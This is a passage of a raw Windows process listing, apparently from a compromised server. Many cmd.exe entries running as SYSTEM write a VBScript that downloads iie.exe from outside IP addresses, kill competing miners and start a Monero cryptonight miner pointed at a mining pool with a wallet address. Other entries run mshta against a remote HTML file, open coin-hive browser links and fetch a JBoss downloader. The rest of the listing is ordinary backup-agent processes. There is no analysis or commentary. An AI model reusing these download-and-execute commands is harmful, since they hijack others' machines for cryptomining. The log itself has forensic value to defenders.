hu.vbs&@echo sGet.Mode = 3 >> hu.vbs&@echo sGet.Type = 1 >> hu.vbs&@echo
sGet.Open() >>hu.vbs&@echo sGet.Write(xPost.responseBody) >>hu.vbs&@echo
sGet.SaveToFile d:/iie.exe,2 >>hu.vbs&@cscript hu.vbs&@taskkill /IM 3.exe&@del
hu.vbs&@start d:/iie.exe --donate-level=1 -k -a cryptonight -o
stratum+tcp://pool.minexmr.com:7777 -u
41e2vPcVux9NNeTfWe8TLK2UWxCXJvNyCQtNb69YEexdNs711jEaDRXWbwaVe4vUMveKAzAiA4j8xgUi29T
pKXpm3zKTUYo -p x" NT AUTHORITY\SYSTEM
cmd.exe 1.904 K 204 K 3660 Windows Command Processor Microsoft
Corporation cmd.exe /c c:\windows\system32\mshta.exe http://172.104.53.225/run.html
NT AUTHORITY\SYSTEM
mshta.exe 10.276 K 336 K 640 Microsoft (R) HTML Application host
Microsoft Corporation c:\windows\system32\mshta.exe
http://172.104.53.225/run.html NT AUTHORITY\SYSTEM
cmd.exe 7.148 K 208 K 4688 Windows Command Processor Microsoft
Corporation cmd.exe /c "cmd /c echo Set xPost = CreateObject(Microsoft.XMLHTTP) >
hu.vbs&@echo xPost.Open GET,http://128.199.86.57:8220/iie.exe,0 >> hu.vbs&@echo
xPost.Send() >> hu.vbs&@echo Set sGet = CreateObject(ADODB.Stream) >>
hu.vbs&@echo sGet.Mode = 3 >> hu.vbs&@echo sGet.Type = 1 >> hu.vbs&@echo
sGet.Open() >>hu.vbs&@echo sGet.Write(xPost.responseBody) >>hu.vbs&@echo
sGet.SaveToFile iie.exe,2 >>hu.vbs&@cscript hu.vbs&@taskkill /IM 3.exe&@del
hu.vbs&@start iie.exe --donate-level=1 -k -a cryptonight -o
stratum+tcp://pool.minexmr.com:7777 -u
41e2vPcVux9NNeTfWe8TLK2UWxCXJvNyCQtNb69YEexdNs711jEaDRXWbwaVe4vUMveKAzAiA4j8xgUi29T
pKXpm3zKTUYo -p x" NT AUTHORITY\SYSTEM
cmd.exe 7.148 K 208 K 5012 Windows Command Processor Microsoft
Corporation cmd.exe /c "cmd /c echo Set xPost = CreateObject(Microsoft.XMLHTTP) >
hu.vbs&@echo xPost.Open GET,http://128.199.86.57:8220/iie.exe,0 >> hu.vbs&@echo
xPost.Send() >> hu.vbs&@echo Set sGet = CreateObject(ADODB.Stream) >>
hu.vbs&@echo sGet.Mode = 3 >> hu.vbs&@echo sGet.Type = 1 >> hu.vbs&@echo
sGet.Open() >>hu.vbs&@echo sGet.Write(xPost.responseBody) >>hu.vbs&@echo
sGet.SaveToFile iie.exe,2 >>hu.vbs&@cscript hu.vbs&@taskkill /IM 3.exe&@del
hu.vbs&@start iie.exe --donate-level=1 -k -a cryptonight -o
stratum+tcp://pool.minexmr.com:7777 -u
41e2vPcVux9NNeTfWe8TLK2UWxCXJvNyCQtNb69YEexdNs711jEaDRXWbwaVe4vUMveKAzAiA4j8xgUi29T
pKXpm3zKTUYo -p x" NT AUTHORITY\SYSTEM
cmd.exe 7.148 K 208 K 3580 Windows Command Processor Microsoft
Corporation cmd.exe /c "cmd /c echo Set xPost = CreateObject(Microsoft.XMLHTTP) >
hu.vbs&@echo xPost.Open GET,http://128.199.86.57:8220/iie.exe,0 >> hu.vbs&@echo
xPost.Send() >> hu.vbs&@echo Set sGet = CreateObject(ADODB.Stream) >>
hu.vbs&@echo sGet.Mode = 3 >> hu.vbs&@echo sGet.Type = 1 >> hu.vbs&@echo
sGet.Open() >>hu.vbs&@echo sGet.Write(xPost.responseBody) >>hu.vbs&@echo
sGet.SaveToFile iie.exe,2 >>hu.vbs&@cscript hu.vbs&@taskkill /IM 3.exe&@del
hu.vbs&@start iie.exe --donate-level=1 -k -a cryptonight -o
stratum+tcp://pool.minexmr.com:7777 -u
41e2vPcVux9NNeTfWe8TLK2UWxCXJvNyCQtNb69YEexdNs711jEaDRXWbwaVe4vUMveKAzAiA4j8xgUi29T
pKXpm3zKTUYo -p x" NT AUTHORITY\SYSTEM
cmd.exe 7.148 K 208 K 5832 Windows Command Processor Microsoft
Corporation cmd.exe /c "cmd /c echo Set xPost = CreateObject(Microsoft.XMLHTTP) >
hu.vbs&@echo xPost.Open GET,http://128.199.86.57:8220/iie.exe,0 >> hu.vbs&@echo
xPost.Send() >> hu.vbs&@echo Set sGet = CreateObject(ADODB.Stream) >>
hu.vbs&@echo sGet.Mode = 3 >> hu.vbs&@echo sGet.Type = 1 >> hu.vbs&@echo
sGet.Open() >>hu.vbs&@echo sGet.Write(xPost.responseBody) >>hu.vbs&@echo
sGet.SaveToFile iie.exe,2 >>hu.vbs&@cscript hu.vbs&@taskkill /IM 3.exe&@del
hu.vbs&@start iie.exe --donate-level=1 -k -a cryptonight -o
stratum+tcp://pool.minexmr.com:7777 -u
41e2vPcVux9NNeTfWe8TLK2UWxCXJvNyCQtNb69YEexdNs711jEaDRXWbwaVe4vUMveKAzAiA4j8xgUi29T
pKXpm3zKTUYo -p x" NT AUTHORITY\SYSTEM
cmd.exe 7.148 K 208 K 2984 Windows Command Processor Microsoft
Corporation cmd.exe /c "cmd /c echo Set xPost = CreateObject(Microsoft.XMLHTTP) >
hu.vbs&@echo xPost.Open GET,http://128.199.86.57:8220/iie.exe,0 >> hu.vbs&@echo
xPost.Send() >> hu.vbs&@echo Set sGet = CreateObject(ADODB.Stream) >>
hu.vbs&@echo sGet.Mode = 3 >> hu.vbs&@echo sGet.Type = 1 >> hu.vbs&@echo
sGet.Open() >>hu.vbs&@echo sGet.Write(xPost.responseBody) >>hu.vbs&@echo
sGet.SaveToFile iie.exe,2 >>hu.vbs&@cscript hu.vbs&@taskkill /IM 3.exe&@del
hu.vbs&@start iie.exe --donate-level=1 -k -a cryptonight -o
stratum+tcp://pool.minexmr.com:7777 -u
41e2vPcVux9NNeTfWe8TLK2UWxCXJvNyCQtNb69YEexdNs711jEaDRXWbwaVe4vUMveKAzAiA4j8xgUi29T
pKXpm3zKTUYo -p x" NT AUTHORITY\SYSTEM
cmd.exe 7.148 K 208 K 4808 Windows Command Processor Microsoft
Corporation cmd.exe /c "cmd /c echo Set xPost = CreateObject(Microsoft.XMLHTTP) >
hu.vbs&@echo xPost.Open GET,http://128.199.86.57:8220/iie.exe,0 >> hu.vbs&@echo
xPost.Send() >> hu.vbs&@echo Set sGet = CreateObject(ADODB.Stream) >>
hu.vbs&@echo sGet.Mode = 3 >> hu.vbs&@echo sGet.Type = 1 >> hu.vbs&@echo
sGet.Open() >>hu.vbs&@echo sGet.Write(xPost.responseBody) >>hu.vbs&@echo
sGet.SaveToFile iie.exe,2 >>hu.vbs&@cscript hu.vbs&@taskkill /IM 3.exe&@del
hu.vbs&@start iie.exe --donate-level=1 -k -a cryptonight -o
stratum+tcp://pool.minexmr.com:7777 -u
41e2vPcVux9NNeTfWe8TLK2UWxCXJvNyCQtNb69YEexdNs711jEaDRXWbwaVe4vUMveKAzAiA4j8xgUi29T
pKXpm3zKTUYo -p x" NT AUTHORITY\SYSTEM
cmd.exe 7.148 K 208 K 4656 Windows Command Processor Microsoft
Corporation cmd.exe /c "cmd /c echo Set xPost = CreateObject(Microsoft.XMLHTTP) >
hu.vbs&@echo xPost.Open GET,http://128.199.86.57:8220/iie.exe,0 >> hu.vbs&@echo
xPost.Send() >> hu.vbs&@echo Set sGet = CreateObject(ADODB.Stream) >>
hu.vbs&@echo sGet.Mode = 3 >> hu.vbs&@echo sGet.Type = 1 >> hu.vbs&@echo
sGet.Open() >>hu.vbs&@echo sGet.Write(xPost.responseBody) >>hu.vbs&@echo
sGet.SaveToFile iie.exe,2 >>hu.vbs&@cscript hu.vbs&@taskkill /IM 3.exe&@del
hu.vbs&@start iie.exe --donate-level=1 -k -a cryptonight -o
stratum+tcp://pool.minexmr.com:7777 -u
41e2vPcVux9NNeTfWe8TLK2UWxCXJvNyCQtNb69YEexdNs711jEaDRXWbwaVe4vUMveKAzAiA4j8xgUi29T
pKXpm3zKTUYo -p x" NT AUTHORITY\SYSTEM
cmd.exe 7.148 K 208 K 5892 Windows Command Processor Microsoft
Corporation cmd.exe /c "cmd /c echo Set xPost = CreateObject(Microsoft.XMLHTTP) >
hu.vbs&@echo xPost.Open GET,http://128.199.86.57:8220/iie.exe,0 >> hu.vbs&@echo
xPost.Send() >> hu.vbs&@echo Set sGet = CreateObject(ADODB.Stream) >>
hu.vbs&@echo sGet.Mode = 3 >> hu.vbs&@echo sGet.Type = 1 >> hu.vbs&@echo
sGet.Open() >>hu.vbs&@echo sGet.Write(xPost.responseBody) >>hu.vbs&@echo
sGet.SaveToFile iie.exe,2 >>hu.vbs&@cscript hu.vbs&@taskkill /IM 3.exe&@del
hu.vbs&@start iie.exe --donate-level=1 -k -a cryptonight -o
stratum+tcp://pool.minexmr.com:7777 -u
41e2vPcVux9NNeTfWe8TLK2UWxCXJvNyCQtNb69YEexdNs711jEaDRXWbwaVe4vUMveKAzAiA4j8xgUi29T
pKXpm3zKTUYo -p x" NT AUTHORITY\SYSTEM
cmd.exe 7.148 K 208 K 1408 Windows Command Processor Microsoft
Corporation cmd.exe /c "cmd /c echo Set xPost = CreateObject(Microsoft.XMLHTTP) >
hu.vbs&@echo xPost.Open GET,http://128.199.86.57:8220/iie.exe,0 >> hu.vbs&@echo
xPost.Send() >> hu.vbs&@echo Set sGet = CreateObject(ADODB.Stream) >>
hu.vbs&@echo sGet.Mode = 3 >> hu.vbs&@echo sGet.Type = 1 >> hu.vbs&@echo
sGet.Open() >>hu.vbs&@echo sGet.Write(xPost.responseBody) >>hu.vbs&@echo
sGet.SaveToFile iie.exe,2 >>hu.vbs&@cscript hu.vbs&@taskkill /IM 3.exe&@del
hu.vbs&@start iie.exe --donate-level=1 -k -a cryptonight -o
stratum+tcp://pool.minexmr.com:7777 -u
41e2vPcVux9NNeTfWe8TLK2UWxCXJvNyCQtNb69YEexdNs711jEaDRXWbwaVe4vUMveKAzAiA4j8xgUi29T
pKXpm3zKTUYo -p x" NT AUTHORITY\SYSTEM
cmd.exe 7.148 K 208 K 1872 Windows Command Processor Microsoft
Corporation cmd.exe /c "cmd /c echo Set xPost = CreateObject(Microsoft.XMLHTTP) >
hu.vbs&@echo xPost.Open GET,http://128.199.86.57:8220/iie.exe,0 >> hu.vbs&@echo
xPost.Send() >> hu.vbs&@echo Set sGet = CreateObject(ADODB.Stream) >>
hu.vbs&@echo sGet.Mode = 3 >> hu.vbs&@echo sGet.Type = 1 >> hu.vbs&@echo
sGet.Open() >>hu.vbs&@echo sGet.Write(xPost.responseBody) >>hu.vbs&@echo
sGet.SaveToFile iie.exe,2 >>hu.vbs&@cscript hu.vbs&@taskkill /IM 3.exe&@del
hu.vbs&@start iie.exe --donate-level=1 -k -a cryptonight -o
stratum+tcp://pool.minexmr.com:7777 -u
41e2vPcVux9NNeTfWe8TLK2UWxCXJvNyCQtNb69YEexdNs711jEaDRXWbwaVe4vUMveKAzAiA4j8xgUi29T
pKXpm3zKTUYo -p x" NT AUTHORITY\SYSTEM
cmd.exe 7.148 K 208 K 6872 Windows Command Processor Microsoft
Corporation cmd.exe /c "cmd /c echo Set xPost = CreateObject(Microsoft.XMLHTTP) >
hu.vbs&@echo xPost.Open GET,http://128.199.86.57:8220/iie.exe,0 >> hu.vbs&@echo
xPost.Send() >> hu.vbs&@echo Set sGet = CreateObject(ADODB.Stream) >>
hu.vbs&@echo sGet.Mode = 3 >> hu.vbs&@echo sGet.Type = 1 >> hu.vbs&@echo
sGet.Open() >>hu.vbs&@echo sGet.Write(xPost.responseBody) >>hu.vbs&@echo
sGet.SaveToFile iie.exe,2 >>hu.vbs&@cscript hu.vbs&@taskkill /IM 3.exe&@del
hu.vbs&@start iie.exe --donate-level=1 -k -a cryptonight -o
stratum+tcp://pool.minexmr.com:7777 -u
41e2vPcVux9NNeTfWe8TLK2UWxCXJvNyCQtNb69YEexdNs711jEaDRXWbwaVe4vUMveKAzAiA4j8xgUi29T
pKXpm3zKTUYo -p x" NT AUTHORITY\SYSTEM
cmd.exe 5.740 K 208 K 2728 Windows Command Processor Microsoft
Corporation cmd.exe /c "start iexplore.exe http://cnhv.co/gmtv&start chrome
http://cnhv.co/gmtv&start firefox http://cnhv.co/gmtv&start opera
http://cnhv.co/gmtv&" NT AUTHORITY\SYSTEM
iexplore.exe 13.624 K 1.024 K 460 Internet Explorer Microsoft
Corporation "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"
http://cnhv.co/gmtv NT AUTHORITY\SYSTEM
iexplore.exe 29.584 K 1.420 K 2612 Internet Explorer Microsoft
Corporation "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:460
CREDAT:79873 NT AUTHORITY\SYSTEM
iexplore.exe 25.364 K 1.336 K 4796 Internet Explorer Microsoft
Corporation "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:460
CREDAT:14341 NT AUTHORITY\SYSTEM
iexplore.exe 25.344 K 1.484 K 2512 Internet Explorer Microsoft
Corporation "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:460
CREDAT:79879 NT AUTHORITY\SYSTEM
cmd.exe 5.732 K 208 K 4920 Windows Command Processor Microsoft
Corporation cmd.exe /c "start iexplore.exe http://cnhv.co/gmtv&start chrome
http://cnhv.co/gmtv&start firefox http://cnhv.co/gmtv&start opera
http://cnhv.co/gmtv&" NT AUTHORITY\SYSTEM
cmd.exe 5.732 K 208 K 5904 Windows Command Processor Microsoft
Corporation cmd.exe /c "start iexplore.exe http://cnhv.co/gmtv&start chrome
http://cnhv.co/gmtv&start firefox http://cnhv.co/gmtv&start opera
http://cnhv.co/gmtv&" NT AUTHORITY\SYSTEM
cmd.exe 6.632 K 800 K 4744 Windows Command Processor Microsoft
Corporation cmd.exe /c "start iexplore.exe http://cnhv.co/gmtv&start chrome
http://cnhv.co/gmtv&start firefox http://cnhv.co/gmtv&start opera
http://cnhv.co/gmtv&" NT AUTHORITY\SYSTEM
cmd.exe 6.384 K 780 K 5340 Windows Command Processor Microsoft
Corporation cmd.exe /c "cmd /c echo Set xPost = CreateObject(Microsoft.XMLHTTP) >
hu.vbs&@echo xPost.Open GET,http://165.227.215.212:8220/iie.exe,0 >> hu.vbs&@echo
xPost.Send() >> hu.vbs&@echo Set sGet = CreateObject(ADODB.Stream) >>
hu.vbs&@echo sGet.Mode = 3 >> hu.vbs&@echo sGet.Type = 1 >> hu.vbs&@echo
sGet.Open() >>hu.vbs&@echo sGet.Write(xPost.responseBody) >>hu.vbs&@echo
sGet.SaveToFile iie.exe,2 >>hu.vbs&@cscript hu.vbs&@taskkill /IM ddg.exe&@del
hu.vbs&@taskkill /IM yam.exe&@del hu.vbs&@start iie.exe --donate-level=1 -k -a
cryptonight -o stratum+tcp://pool.minexmr.com:7777 -u
41e2vPcVux9NNeTfWe8TLK2UWxCXJvNyCQtNb69YEexdNs711jEaDRXWbwaVe4vUMveKAzAiA4j8xgUi29T
pKXpm3zKTUYo -p x" NT AUTHORITY\SYSTEM
cscript.exe 6.028 K 232 K 5236 Microsoft (r) Console Based Script Host
Microsoft Corporation cscript //T:240 ../ext/scheduledtasks.vbs NT
AUTHORITY\SYSTEM
cmd.exe 1.508 K 204 K 5024 Windows Command Processor Microsoft
Corporation "C:\WINDOWS\system32\cmd.exe" /c ""C:\Program Files
(x86)\BBWin\tools\jt.exe" /se p > "C:\Program Files (x86)\BBWin\tmp\scheduled.txt"
NT AUTHORITY\SYSTEM
cmd.exe 1.912 K 208 K 7136 Windows Command Processor Microsoft
Corporation cmd.exe /c wscript -e:vbs index_bak.tmp
http://192.3.244.227:1888/WAB/JBoss_DownLoad.exe JBDL.exe NT AUTHORITY\SYSTEM
wscript.exe 5.220 K 208 K 6600 Microsoft (r) Windows Based Script
Host Microsoft Corporation wscript -e:vbs index_bak.tmp
http://192.3.244.227:1888/WAB/JBoss_DownLoad.exe JBDL.exe NT AUTHORITY\SYSTEM
cmd.exe 5.576 K 208 K 6772 Windows Command Processor Microsoft
Corporation cmd.exe /c "start iexplore.exe http://cnhv.co/gmtv&start chrome
http://cnhv.co/gmtv&start firefox http://cnhv.co/gmtv&start opera
http://cnhv.co/gmtv&" NT AUTHORITY\SYSTEM
cmd.exe 5.488 K 208 K 6156 Windows Command Processor Microsoft
Corporation cmd.exe /c "cmd /c echo Set xPost = CreateObject(Microsoft.XMLHTTP) >
hu.vbs&@echo xPost.Open GET,http://165.227.215.212:8220/iie.exe,0 >> hu.vbs&@echo
xPost.Send() >> hu.vbs&@echo Set sGet = CreateObject(ADODB.Stream) >>
hu.vbs&@echo sGet.Mode = 3 >> hu.vbs&@echo sGet.Type = 1 >> hu.vbs&@echo
sGet.Open() >>hu.vbs&@echo sGet.Write(xPost.responseBody) >>hu.vbs&@echo
sGet.SaveToFile iie.exe,2 >>hu.vbs&@cscript hu.vbs&@taskkill /IM ddg.exe&@del
hu.vbs&@taskkill /IM yam.exe&@del hu.vbs&@start iie.exe --donate-level=1 -k -a
cryptonight -o stratum+tcp://pool.minexmr.com:7777 -u
41e2vPcVux9NNeTfWe8TLK2UWxCXJvNyCQtNb69YEexdNs711jEaDRXWbwaVe4vUMveKAzAiA4j8xgUi29T
pKXpm3zKTUYo -p x" NT AUTHORITY\SYSTEM
cscript.exe 5.952 K 216 K 6140 Microsoft (r) Console Based Script Host
Microsoft Corporation cscript //T:240 ../ext/who.vbs NT
AUTHORITY\SYSTEM
cmd.exe 1.508 K 204 K 5800 Windows Command Processor Microsoft
Corporation "C:\WINDOWS\system32\cmd.exe" /K qwinsta > C:\WINDOWS\Temp\qwinsta2.tmp
& exit NT AUTHORITY\SYSTEM
bpfis.exe 6.096 K 204 K 3728 Symantec Corporation "C:\Program
Files\Veritas\NetBackup\bin\bpfis.exe" create -nbu -owner NBU -id tesla-as06-
bck_1513908012 -bpstart_to 600 -bpend_to 600 -backup_copy 0 -pt 13 -clnt tesla-
as06-bck -fscp 1 -fscp_cksv 0 -ru root -rg root -class
IT_OCN47107_2WEEKS_TESI_WIN_SUN_4AM -sched Daily_Incremental -fso -S cmsla-
bk13v.cms.colt -jobid 275171 -WOFB -fim VSS -nbu_version 135266304
-application_consistent 1 NT AUTHORITY\SYSTEM
bpfis.exe 6.096 K 204 K 6604 Symantec Corporation "C:\Program
Files\Veritas\NetBackup\bin\bpfis.exe" create -nbu -owner NBU -id tesla-as06-
bck_1513920622 -bpstart_to 600 -bpend_to 600 -backup_copy 0 -pt 13 -clnt tesla-
as06-bck -fscp 1 -fscp_cksv 0 -ru root -rg root -class
IT_OCN47107_2WEEKS_TESI_WIN_SUN_4AM -sched Daily_Incremental -fso -S cmsla-
bk13v.cms.colt -jobid 275171 -WOFB -fim VSS -nbu_version 135266304
-application_consistent 1 NT AUTHORITY\SYSTEM
bpfis.exe 6.096 K 204 K 5724 Symantec Corporation "C:\Program
Files\Veritas\NetBackup\bin\bpfis.exe" create -nbu -owner NBU -id tesla-as06-
bck_1513994410 -bpstart_to 600 -bpend_to 600 -backup_copy 0 -pt 13 -clnt tesla-
as06-bck -fscp 1 -fscp_cksv 0 -ru root -rg root -class
IT_OCN47107_2WEEKS_TESI_WIN_SUN_4AM -sched Daily_Incremental -fso -S cmsla-
bk13v.cms.colt -jobid 276198 -WOFB -fim VSS -nbu_version 135266304
-application_consistent 1 NT AUTHORITY\SYSTEM
bpfis.exe 6.096 K 204 K 7092 Symantec Corporation "C:\Program
Files\Veritas\NetBackup\bin\bpfis.exe" create -nbu -owner NBU -id tesla-as06-
bck_1514007018 -bpstart_to 600 -bpend_to 600 -backup_copy 0 -pt 13 -clnt tesla-
as06-bck -fscp 1 -fscp_cksv 0 -ru root -rg root -class
IT_OCN47107_2WEEKS_TESI_WIN_SUN_4AM -sched Daily_Incremental -fso -S cmsla-
bk13v.cms.colt -jobid 276198 -WOFB -fim VSS -nbu_version 135266304
-application_consistent 1 NT AUTHORITY\SYSTEM
bpfis.exe 6.096 K 204 K 1252 Symantec Corporation "C:\Program
Files\Veritas\NetBackup\bin\bpfis.exe" create -nbu -owner NBU -id tesla-as06-
bck_1514080802 -bpstart_to 600 -bpend_to 600 -backup_copy 0 -pt 13 -clnt tesla-
as06-bck -fscp 1 -fscp_cksv 0 -ru root -rg root -class
IT_OCN47107_2WEEKS_TESI_WIN_SUN_4AM -sched Weekly_Full -fso -S cmsla-bk13v.cms.colt
-jobid 277220 -WOFB -fim VSS -nbu_version 135266304 -application_consistent 1
NT AUTHORITY\SYSTEM
bpfis.exe 6.096 K 204 K 1356 Symantec Corporation "C:\Program
Files\Veritas\NetBackup\bin\bpfis.exe" create -nbu -owner NBU -id tesla-as06-
bck_1514093413 -bpstart_to 600 -bpend_to 600 -backup_copy 0 -pt 13 -clnt tesla-
as06-bck -fscp 1 -fscp_cksv 0 -ru root -rg root -class
IT_OCN47107_2WEEKS_TESI_WIN_SUN_4AM -sched Weekly_Full -fso -S cmsla-bk13v.cms.colt
-jobid 277220 -WOFB -fim VSS -nbu_version 135266304 -application_consistent 1
NT AUTHORITY\SYSTEM
bpfis.exe 6.096 K 204 K 3144 Symantec Corporation "C:\Program
Files\Veritas\NetBackup\bin\bpfis.exe" create -nbu -owner NBU -id tesla-as06-
bck_1514167202 -bpstart_to 600 -bpend_to 600 -backup_copy 0 -pt 13 -clnt tesla-
as06-bck -fscp 1 -fscp_cksv 0 -ru root -rg root -class
IT_OCN47107_2WEEKS_TESI_WIN_SUN_4AM -sched Daily_Incremental -fso -S cmsla-
bk13v.cms.colt -jobid 278242 -WOFB -fim VSS -nbu_version 135266304
-application_consistent 1 NT AUTHORITY\SYSTEM
bpfis.exe 6.096 K 204 K 1908 Symantec Corporation "C:\Program
Files\Veritas\NetBackup\bin\bpfis.exe" create -nbu -owner NBU -id tesla-as06-
bck_1514179810 -bpstart_to 600 -bpend_to 600 -backup_copy 0 -pt 13 -clnt tesla-
as06-bck -fscp 1 -fscp_cksv 0 -ru root -rg root -class
IT_OCN47107_2WEEKS_TESI_WIN_SUN_4AM -sched Daily_Incremental -fso -S cmsla-
bk13v.cms.colt -jobid 278242 -WOFB -fim VSS -nbu_version 135266304
-application_consistent 1 NT AUTHORITY\SYSTEM
bpfis.exe 6.096 K 204 K 1964 Symantec Corporation "C:\Program
Files\Veritas\NetBackup\bin\bpfis.exe" create -nbu -owner NBU -id tesla-as06-
bck_1514253602 -bpstart_to 600 -bpend_to 600 -backup_copy 0 -pt 13 -clnt tesla-
as06-bck -fscp 1 -fscp_cksv 0 -ru root -rg root -class
IT_OCN47107_2WEEKS_TESI_WIN_SUN_4AM -sched Daily_Incremental -fso -S cmsla-
bk13v.cms.colt -jobid 279278 -WOFB -fim VSS -nbu_version 135266304
-application_consistent 1 NT AUTHORITY\SYSTEM
bpfis.exe 6.096 K 204 K 6984 Symantec Corporation "C:\Program
Files\Veritas\NetBackup\bin\bpfis.exe" create -nbu -owner NBU -id tesla-as06-
bck_1514266211 -bpstart_to 600 -bpend_to 600 -backup_copy 0 -pt 13 -clnt tesla-
as06-bck -fscp 1 -fscp_cksv 0 -ru root -rg root -class
IT_OCN47107_2WEEKS_TESI_WIN_SUN_4AM -sched Daily_Incremental -fso -S cmsla-
bk13v.cms.colt -jobid 279278 -WOFB -fim VSS -nbu_version 135266304
-application_consistent 1 NT AUTHORITY\SYSTEM
bpfis.exe 6.096 K 204 K 5784 Symantec Corporation "C:\Program
Files\Veritas\NetBackup\bin\bpfis.exe" create -nbu -owner NBU -id tesla-as06-
bck_1514340002 -bpstart_to 600 -bpend_to 600 -backup_copy 0 -pt 13 -clnt tesla-
as06-bck -fscp 1 -fscp_cksv 0 -ru root -rg root -class
IT_OCN47107_2WEEKS_TESI_WIN_SUN_4AM -sched Daily_Incremental -fso -S cmsla-
bk13v.cms.colt -jobid 280301 -WOFB -fim VSS -nbu_version 135266304
-application_consistent 1 NT AUTHORITY\SYSTEM
bpfis.exe 6.096 K 204 K 5736 Symantec Corporation "C:\Program
Files\Veritas\NetBackup\bin\bpfis.exe" create -nbu -owner NBU -id tesla-as06-
bck_1514352610 -bpstart_to 600 -bpend_to 600 -backup_copy 0 -pt 13 -clnt tesla-
as06-bck -fscp 1 -fscp_cksv 0 -ru root -rg root -class
IT_OCN47107_2WEEKS_TESI_WIN_SUN_4AM -sched Daily_Incremental -fso -S cmsla-
bk13v.cms.colt -jobid 280301 -WOFB -fim VSS -nbu_version 135266304
-application_consistent 1 NT AUTHORITY\SYSTEM
bpfis.exe 6.096 K 204 K 6584 Symantec Corporation "C:\Program
Files\Veritas\NetBackup\bin\bpfis.exe" create -nbu -owner NBU -id tesla-as06-
bck_1514426402 -bpstart_to 600 -bpend_to 600 -backup_copy 0 -pt 13 -clnt tesla-
as06-bck -fscp 1 -fscp_cksv 0 -ru root -rg root -class
IT_OCN47107_2WEEKS_TESI_WIN_SUN_4AM -sched Daily_Incremental -fso -S cmsla-
bk13v.cms.colt -jobid 281334 -WOFB -fim VSS -nbu_version 135266304
-application_consistent 1 NT AUTHORITY\SYSTEM
bpfis.exe 6.096 K 204 K 5588 Symantec Corporation "C:\Program
Files\Veritas\NetBackup\bin\bpfis.exe" create -nbu -owner NBU -id tesla-as06-
bck_1514439010 -bpstart_to 600 -bpend_to 600 -backup_copy 0 -pt 13 -clnt tesla-
as06-bck -fscp 1 -fscp_cksv 0 -ru root -rg root -class
IT_OCN47107_2WEEKS_TESI_WIN_SUN_4AM -sched Daily_Incremental -fso -S cmsla-
bk13v.cms.colt -jobid 281334 -WOFB -fim VSS -nbu_version 135266304
-application_consistent 1 NT AUTHORITY\SYSTEM
bpfis.exe 6.096 K 204 K 1308 Symantec Corporation "C:\Program
Files\Veritas\NetBackup\bin\bpfis.exe" create -nbu -owner NBU -id tesla-as06-
bck_1514512802 -bpstart_to 600 -bpend_to 600 -backup_copy 0 -pt 13 -clnt tesla-
as06-bck -fscp 1 -fscp_cksv 0 -ru root -rg root -class
IT_OCN47107_2WEEKS_TESI_WIN_SUN_4AM -sched Daily_Incremental -fso -S cmsla-
bk13v.cms.colt -jobid 282368 -WOFB -fim VSS -nbu_version 135266304
-application_consistent 1 NT AUTHORITY\SYSTEM
bpfis.exe 6.096 K 204 K 7012 Symantec Corporation "C:\Program
Files\Veritas\NetBackup\bin\bpfis.exe" create -nbu -owner NBU -id tesla-as06-
bck_1514525410 -bpstart_to 600 -bpend_to 600 -backup_copy 0 -pt 13 -clnt tesla-
as06-bck -fscp 1 -fscp_cksv 0 -ru root -rg root -class
IT_OCN47107_2WEEKS_TESI_WIN_SUN_4AM -sched Daily_Incremental -fso -S cmsla-
bk13v.cms.colt -jobid 282368 -WOFB -fim VSS -nbu_version 135266304
-application_consistent 1 NT AUTHORITY\SYSTEM
bpfis.exe 6.096 K 204 K 4660 Symantec Corporation "C:\Program
Files\Veritas\NetBackup\bin\bpfis.exe" create -nbu -owner NBU -id tesla-as06-
bck_1514599202 -bpstart_to 600 -bpend_to 600 -backup_copy 0 -pt 13 -clnt tesla-
as06-bck -fscp 1 -fscp_cksv 0 -ru root -rg root -class
IT_OCN47107_2WEEKS_TESI_WIN_SUN_4AM -sched Daily_Incremental -fso -S cmsla-
bk13v.cms.colt -jobid 283389 -WOFB -fim VSS -nbu_version 135266304
-application_consistent 1 NT AUTHORITY\SYSTEM
bpfis.exe 6.096 K 204 K 276 Symantec Corporation "C:\Program
Files\Veritas\NetBackup\bin\bpfis.exe" create -nbu -owner NBU -id tesla-as06-
bck_1514611811 -bpstart_to 600 -bpend_to 600 -backup_copy 0 -pt 13 -clnt tesla-
as06-bck -fscp 1 -fscp_cksv 0 -ru root -rg root -class
IT_OCN47107_2WEEKS_TESI_WIN_SUN_4AM -sched Daily_Incremental -fso -S cmsla-
bk13v.cms.colt -jobid 283389 -WOFB -fim VSS -nbu_version 135266304
-application_consistent 1 NT AUTHORITY\SYSTEM
bpfis.exe 6.096 K 204 K 5636 Symantec Corporation "C:\Program
Files\Veritas\NetBackup\bin\bpfis.exe" create -nbu -owner NBU -id tesla-as06-
bck_1514685602 -bpstart_to 600 -bpend_to 600 -backup_copy 0 -pt 13 -clnt tesla-
as06-bck -fscp 1 -fscp_cksv 0 -ru root -rg root -class
IT_OCN47107_2WEEKS_TESI_WIN_SUN_4AM -sched Weekly_Full -fso -S cmsla-bk13v.cms.colt
-jobid 284419 -WOFB -fim VSS -nbu_version 135266304 -application_consistent 1
NT AUTHORITY\SYSTEM
bpfis.exe 6.096 K 204 K 6460 Symantec Corporation "C:\Program
Files\Veritas\NetBackup\bin\bpfis.exe" create -nbu -owner NBU -id tesla-as06-
bck_1514698210 -bpstart_to 600 -bpend_to 600 -backup_copy 0 -pt 13 -clnt tesla-
as06-bck -fscp 1 -fscp_cksv 0 -ru root -rg root -class
IT_OCN47107_2WEEKS_TESI_WIN_SUN_4AM -sched Weekly_Full -fso -S cmsla-bk13v.cms.colt
-jobid 284419 -WOFB -fim VSS -nbu_version 135266304 -application_consistent 1
NT AUTHORITY\SYSTEM
bpfis.exe 6.096 K 204 K 3528 Symantec Corporation "C:\Program
Files\Veritas\NetBackup\bin\bpfis.exe" create -nbu -owner NBU -id tesla-as06-
bck_1514944800 -bpstart_to 600 -bpend_to 600 -backup_copy 0 -pt 13 -clnt tesla-
as06-bck -fscp 1 -fscp_cksv 0 -ru root -rg root -class
IT_OCN47107_2WEEKS_TESI_WIN_SUN_4AM -sched Daily_Incremental -fso -S cmsla-
bk13v.cms.colt -jobid 286175 -WOFB -fim VSS -nbu_version 135266304
-application_consistent 1 NT AUTHORITY\SYSTEM
bpfis.exe 6.096 K 204 K 5560 Symantec Corporation "C:\Program
Files\Veritas\NetBackup\bin\bpfis.exe" create -nbu -owner NBU -id tesla-as06-
